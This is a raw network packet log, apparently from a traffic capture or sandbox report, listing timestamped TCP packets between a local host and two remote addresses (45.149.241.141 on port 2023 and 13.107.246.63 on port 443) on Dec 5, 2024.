                                                                                                              Dec 5, 2024 10:39:27.810045004 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.810112953 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.810165882 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.811204910 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.811252117 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.811301947 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.812346935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.812361002 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.812405109 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.813493967 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.813564062 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.814630985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.814682961 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.814698935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.815565109 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.815749884 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.815862894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.815964937 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.816889048 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.816992998 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.817042112 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.818084955 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.818137884 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.819206953 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.819283009 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.819299936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.819581985 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.820332050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.820435047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.820522070 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.821513891 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.821584940 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.821666002 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.822619915 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.822717905 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.823616982 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.823744059 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.823873997 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.824964046 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.824991941 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.825016022 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.825057030 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.826051950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.826191902 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.826255083 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.827169895 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.827282906 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.827330112 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.828349113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.828433037 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.828480959 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.829502106 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.829572916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.829627991 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.830646038 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.830693007 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.831582069 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.831851959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.831882954 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.832920074 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.832971096 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.833020926 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.835598946 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.874165058 CET4434991613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.874706984 CET49916443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.874721050 CET4434991613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.875323057 CET49916443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.875329971 CET4434991613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.965965986 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.966058016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.966130972 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.966563940 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.966763973 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.966820002 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.967668056 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.967726946 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.967808962 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.968641996 CET4434991413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.968710899 CET4434991413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.968849897 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.968980074 CET49914443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.968981981 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.969059944 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.969176054 CET49914443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.969188929 CET4434991413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.969957113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.970086098 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.970247984 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.971210003 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.971337080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.971401930 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.972294092 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.972390890 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.972475052 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.973391056 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.973525047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.974169016 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.974524021 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.974659920 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.974737883 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.975744963 CET49920443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.975783110 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.975795031 CET4434992013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.975869894 CET49920443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.975869894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.975939035 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.976134062 CET49920443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.976151943 CET4434992013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.976867914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.977056026 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.977138996 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.978101969 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.978200912 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.978277922 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.979131937 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.979146004 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.979196072 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.980283976 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.980329037 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.980387926 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.981383085 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.981498957 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.981564999 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.982553959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.982640982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.982681990 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.983445883 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.983618975 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.983669043 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.983670950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.983716011 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.983728886 CET49915443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.983764887 CET49915443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.983764887 CET49915443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.983767033 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.983782053 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.983792067 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.984797955 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.985038996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.985332966 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.985955000 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.986211061 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.986263990 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.987099886 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.987162113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.987303972 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.987675905 CET49921443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.987713099 CET4434992113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.987782955 CET49921443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.988034964 CET49921443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.988049030 CET4434992113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.988254070 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.988368988 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.988440990 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.989399910 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.989564896 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.989617109 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.990566015 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.990622997 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.990818977 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.991667032 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.991771936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.991844893 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.992810965 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.992925882 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.993659019 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.993949890 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.994050980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.994096994 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.995085955 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.995172977 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.995276928 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.996228933 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.996313095 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.996360064 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.997400999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.997524023 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.997617960 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.998594999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.998706102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.998759031 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.999680996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.999876976 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.999957085 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.000850916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.000971079 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.001055956 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.001969099 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.002154112 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.002228022 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.003176928 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.003297091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.003330946 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.004260063 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.004360914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.004434109 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.005390882 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.005506039 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.005706072 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.006575108 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.006665945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.006722927 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.007765055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.007829905 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.007880926 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.008868933 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.008980036 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.009118080 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.009994984 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.010066032 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.010142088 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.011158943 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.011173010 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.011219025 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.012264013 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.012392998 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.012466908 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.013433933 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.013596058 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.013659954 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.014569044 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.014715910 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.014794111 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.015696049 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.015783072 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.015856028 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.016904116 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.017107010 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.017157078 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.018193960 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.018287897 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.018341064 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.019299984 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.019490004 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.019527912 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.020354986 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.020498991 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.020684004 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.021481991 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.021569014 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.021639109 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.022603035 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.022701025 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.022762060 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.023715973 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.023806095 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.023855925 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.024853945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.024956942 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.025038004 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.025974035 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.114940882 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.158123016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.158271074 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.158361912 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.158674955 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.158772945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.158862114 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.159862995 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.159960032 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.160020113 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.161164999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.161204100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.161267996 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.162184000 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.162372112 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.162486076 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.163431883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.163585901 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.163700104 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.164571047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.164652109 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.164760113 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.165707111 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.165774107 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.165824890 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.166907072 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.166999102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.167042971 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.168116093 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.168204069 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.168237925 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.169210911 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.169363976 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.169444084 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.170672894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.170712948 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.170774937 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.171480894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.171545029 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.171622992 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.172456980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.172511101 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.172559023 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.173701048 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.173741102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.173809052 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.174689054 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.174803972 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.174870968 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.176016092 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.176031113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.176095009 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.177027941 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.177098036 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.177134991 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.178235054 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.178347111 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.178394079 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.179267883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.179372072 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.179445982 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.180473089 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.180545092 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.180588007 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.181622028 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.181751966 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.182015896 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.182725906 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.182822943 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.182874918 CET499122023192.168.2.645.149.241.141
